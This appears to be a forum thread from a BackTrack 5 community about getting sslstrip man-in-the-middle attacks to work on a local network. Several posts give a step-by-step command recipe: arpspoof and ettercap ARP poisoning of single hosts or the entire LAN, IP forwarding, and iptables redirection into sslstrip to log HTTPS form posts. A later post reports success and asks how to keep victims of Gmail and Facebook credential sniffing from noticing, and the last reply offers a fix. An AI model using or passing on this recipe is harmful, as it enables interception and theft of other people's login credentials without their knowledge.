Sslstrip in a lan - Problems !

[voidnecron]

Yeah, the step between beginner and expert is too big, a 'moderate/general questions' topic might be handy.
Mods? An good idea or not welcome?

[comaX]

Yeah, the step between beginner and expert is too big, a 'moderate/general questions' topic might be handy.
Mods? An good idea or not welcome?

BackTrack 5 General Topics maybe ? Don't tell me you didn't see that ! You just have to scroll down a little more than usual

[acutev6]

Hi Carto
Just one question...is it possible to have multiple victims or not in arpspoof? (I mean 2 or 3 <ipvictim>)
Any idea?

Yes, i guess you could even arpspoof entire lan by placing just "//" in the place of "/victimip/".
Hope it works.

[snafu777]

Alright,

This plays awesomely into what will be my first thread (Posted shortly after I type this response up)

So,

I've seen so many places on this forum where people have issues MITMing. The cause? ----> The user is a "re-tard" RTFM. <---- I'll admit when i first started playing around I wanted quick answers, so I would hop on IRC and try to get somebody to do the manual reading for me. That was okay then for me, but it made ME look like an idiot and a lazy, because I was, I was too lazy to read a small man page or do some googling to figure the question out for myself. Now, I'm not saying never ask, cuz there are definately times when I ask, cuz I need an answer right then and there, and dont have the time to read man pages or google; it's just I try to limit them now, as opposed to 2 years ago when i first started *nix'ing it up.

Okay, Enuf ranting, had to get that out, take it for what it's worth.

Now, ON to the solution.

While there are a myriad of programs out there which probably do packet forwarding, the two I come across the most revolve around Ettercap-NG and the kernel itself

-------------------------------------------------------------
If you decide to invoke: echo 1 > /proc/sys/net/ipv4/ip_forward

**MAKE SURE**

That you invoke the -u option for Ettercap

---OTHERWISE---

Packets get double forwarded........ causing confusion and possible self awareness, leading to Skynets Awakening and eventually Judgement Day.....


If you do not use the: -u flag for ettercap, then ettercap will forward the packets for you.
--------------------------------------------------------------------------------------


V/r,
Snafu
Pffbt....

[Stan464]

@Carto_ iv'e experienced the same problem, sometimes wireless can or could cause packet loss, i also did mine wireless and sometimes it will cry and say "Network shutting down" or it would stop ARP Spoofing and would time out ect, (Im using a nice wireless card aswell) Soo try it via a LAN Cable n see if it helps.

my issue is my ssl strip dosnt seem to wanna log HTTPs Trafic and 9/10 it will either not work at all or display all the http junk and headers, thats it.

[maverik35]

Do this:
terminal 1:
ettercap -Tqi "iface" -M arp:remote // /GW/ -P autoadd (this way, every machines that connects after ettercap launced, will be added to host automatically and spoofed)
remember to use key "q" to quit ettercap..This way all hosts will be re-arped..Otherway, if you use ctl z, you will mess the arps and lan will be messed up.

termina 2:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
sslstrip -p -f (default is -p which is only ssl posts, you do not need so much info in sslstrip.log)
Use ctl z to stop sslstrip.

Or you can use:
terminal 1:
forward traffic manually (echo 1 > ........)
arpspoof -i "iface" -t "target" "gw"
ettercap -Tqi "iface" -u (this way, won't forward traffic, that will be your responsability)
remember to use key "q" to quit ettercap..This way all hosts will be re-arped..Otherway, if you use ctl z, you will mess the arps and lan will be messed up.

termina 2:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
sslstrip -p -f (default is -p which is only ssl posts, default port is 10000, you do not need so much info in sslstrip.log, only ssl posts)
Use ctl z to stop sslstrip.

In method 1, you need to uncomment "iptables" section in etter.conf and change the id's in the first lines: to "0" if BT5, and your id (your id) if using ettercap installed in some other linux distro (debian, Ubuntu, etc)..
Hope this helps....

[zallfaizall]

i have ready install sll strip but it not work..
i think it should wrong strip....

[blackRock]

@maverik35, your recipe work nice.
https login sites, such as, gmail.com, facebook.com etc, doesn't login users after credentials given. Is there any way to pass sniffed credentials and login user?
When they refuse to login, users will notice that something is wrong...

[J0hnnyb14z3]

Make sure you are using the newest version of sslstrip.. moxie fixed some stuff in version 9 relating to gmail/facebook etc login issues.. newest versions are available from thoughtcrime.org.. hope that helps!